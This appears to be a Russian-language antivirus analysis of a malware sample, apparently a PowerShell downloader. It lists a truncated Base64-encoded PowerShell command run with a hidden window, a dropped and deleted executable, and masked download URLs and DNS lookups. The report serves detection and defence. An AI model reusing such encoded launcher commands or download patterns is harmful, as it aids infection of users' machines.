Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AZQB0AHMAbwBwAHoAbwBvAGoAPQAnAG4AbwBpAHkAawBvAGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AFIASQBUAGAAeQBgAHAAUgBPAHQAbwBjAE8AbAAiAC...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\985.exe
Удаляет следующие файлы
- %HOMEPATH%\985.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://www.ra###.com.au/fodico/it_na0x8_nykhe/
- http://www.ra###.com.au/cgi-sys/suspendedpage.cgi
- http://st##wim.com/tj_fk_6/
- http://sm####puters.com/libraries/3tv_vzx_z3g/
- http://je###ationz.com/icon/os/css/4ekl8_lwj_c6d0/
UDP
- DNS ASK ra###.com.au
- DNS ASK st##wim.com
- DNS ASK sm####puters.com
- DNS ASK je###ationz.com
- DNS ASK he##ey.net
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB3AG8AZQB0AHMAbwBwAHoAbwBvAGoAPQAnAG4AbwBpAHkAawBvAGUAbgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAYwB1AFIASQBUAGAAeQBgAHAAUgBPAHQAbwBjAE8AbAAiAC...' (со скрытым окном)
